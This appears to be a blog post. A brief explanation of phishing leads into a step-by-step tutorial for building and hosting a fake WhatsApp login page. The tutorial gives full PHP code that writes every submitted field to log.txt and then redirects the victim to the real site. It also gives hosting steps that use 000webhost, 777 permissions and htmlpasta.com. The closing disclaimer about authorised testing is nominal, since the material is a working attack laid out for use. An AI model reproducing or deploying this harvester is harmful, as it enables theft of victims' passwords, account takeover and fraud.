*phishing*

* phishing*

                                                                   

                         

Phishing is the crime of deceiving people into sharing sensitive information like passwords and credit card numbers. As with real fishing, there's more than one way to reel in a victim, but one phishing tactic is the most common. Victims receive a malicious email (malspam) or a text message that imitates (or “spoofs”) a person or organization they trust, like a coworker, a bank, or a government office. When the victim opens the email or text, they find a scary message meant to overcome their better judgement by filling them with fear. The message demands that the victim go to a website and take immediate action or risk some sort of consequence. 

If users take the bait and click the link, they're sent to an imitation of a legitimate website. From here, they're asked to log in with their username and password credentials. If they are gullible enough to comply, the sign-on information goes to the attacker, who uses it to steal identities, pilfer bank accounts, and sell personal information on the black market.

Phishing attacks typically rely on social networking techniques applied to email or other electronic communication methods, including direct messages sent over social networks and SMS text messages.

Phishers may use social engineering and other public sources of information, including social networks like LinkedIn, Facebook and Twitter, to gather background information about the victim's personal and work history, interests and activities. These sources are usually used to uncover names, job titles and email addresses of potential victims, as well as other additional information. This information can then be used to craft a believable email.

     How can we generate a phishing page ???  

 I will go through every step necessary to create and host a phishing page.

there you go..................

 step 1:- copy or download the source code of the website.

                                      for ex:-whatsapp

Open a website of which Phishing page do you want then press ctrl+U to open its source code file. For ex:- I’m copying the code of WhatsApp.com and then I will make a WhatsApp phishing page. Well, this is what which you want …Right!! 😛

So I’m copying the source code from WhatsApp.com by pressing ctrl+U. You can see here the source code from WhatsApp.com is shown here.

The only thing you have to do is to select all code and then copy this code by pressing ctrl+A and then ctrl+C and then open a notepad file and paste it there by pressing ctrl+V.

You can see here I pasted down the whole code from website to my notepad file.

     
    Here the 1st step is done.😁😁

   step 2:- Find the Password-Sending Method.

                     


Now, you have to find this line by pressing ctrl+F and type this whole line there and press Enter.

action=”https://www.WhatsApp.com/login.php?login_attempt=1&lwv=110″ method=”post”

Let’s do some changes, You can see the path of WhatsApp is shown here. Copy this whole path and replace it with login.php and also change the method from post to get. and save this notepad file with the name WhatsApp.html.

           2nd step done😍.........

step 3:- creating a PHP File for Password Harvesting

The PHP file is basically the tool that harvests the users password in this scenario. There are several ways you can create this PHP if you have some programming knowledge, but if you don't, just copy my exemplar PHP.

<?php
header ('Location: www.WhatsApp.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n\n\n\n");
fclose($handle);
exit;
?>

Same as above, save the PHP file as "All Files" and as "post.php". Change the encoding to Unicode and you should be ready to go!

         3rd step done😊....

step 4:- Hosting the PHP File for Password Storing

Now here is the juicy part, making your fake website online so other people can browse it.

You can use any free hosting services to host and store passwords. However, the hosting plan has to include something called "FTP". For this tutorial, I will be using 000webhost.

Navigate to the FTP Server for Your Web Hosting Service

\\For this step, I assume that you have already created a website with your hosting service.

For 000webhost, you simply click on "File manager" and click "Upload Files". Here is a picture of the FTP server for 000webhost:

Ignore the other files, those are just some of my personal stuff, unrelated to this tutorial.

Upload Your PHP Files and Change Permission

As you can see, I have already uploaded my PHP file. But you need to just upload it to the main folder of your FTP server. (Some FTP server doesn't allow you to upload to the root folder, just follow their particular instructions).

Now you need to change the permission to "777", which is basically every single permission. When prompted to tick boxes for the permissions, just tick every single one.

Now you can close the FTP server. Note down your web address!

                     

                          4th step done✌✌......

step 5:- Hosting the Actual Phishing Page.

  For this step, you will need to use the exact hosting provider.

Configuring the post.php Form

Now, before you host the website, remember the post.php/login form thing we configured above?

You need to find the login form thing again in your index.html and replace the "post.php" with "http://yourwebsiteforyourpostphpupload/post.php", assuming that you uploaded to the root folder. Remember to add http:// in front of the site. In order to test this, navigate to the website (http://yourwebsiteforyourpostphpupload/post.php) and see if it redirects you to WhatsApp.com, if it does then you have pasted the correct site. If it doesn't, then double check if you have uploaded your file to the correct directory.

Hosting the Actual Page

Navigate to htmlpasta.com. You will see something similar to this:

Then, you need to copy the index.html file for your phishing site and paste it in here.

               5th step done

                 yeah😄.

                         Congratulations!

Congrats! You have finished hosting your first phishing site! Navigate to your site and try to enter some fake login details, after you click the login button, it should redirect you to WhatsApp.com. Login to your FTP server that you hosted your post.php file, and there should be a new document called Log.txt that is stored within the same folder as your post.php file. Any login details should be stored there.

Remember, please do not use this for malicious purpose, only use for penetration testing and with authorisation from your victims.

If you have any question then please comment down below.